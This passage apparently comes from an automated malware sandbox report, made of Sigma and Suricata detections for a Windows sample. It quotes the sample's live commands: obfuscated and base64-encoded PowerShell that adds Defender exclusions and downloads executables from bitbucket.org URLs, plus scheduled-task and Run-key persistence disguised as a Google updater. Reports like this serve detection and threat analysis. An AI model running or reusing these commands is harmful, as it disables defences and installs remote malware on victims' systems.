+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBz
                        Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execu
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 8052, ProcessName: powershell.exe
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\LicCheck.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\LicCheck.exe, ParentProcessId: 7932, ParentProcessName: LicCheck.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ProcessId: 7768, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Execution of Powershell with Base64
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBz
                        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execu
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\LicCheck.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\LicCheck.exe, ParentProcessId: 7932, ParentProcessName: LicCheck.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ProcessId: 7768, ProcessName: schtasks.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 8168, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBz

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-04T19:13:59.781016+020020397751A Network Trojan was detected192.168.2.44973945.159.189.10580TCP
                        2024-10-04T19:14:57.437285+020020397751A Network Trojan was detected192.168.2.45000745.159.189.10580TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-04T19:14:01.488048+020020397761A Network Trojan was detected192.168.2.44974045.159.189.10580TCP
                        2024-10-04T19:14:59.158697+020020397761A Network Trojan was detected192.168.2.45000845.159.189.10580TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
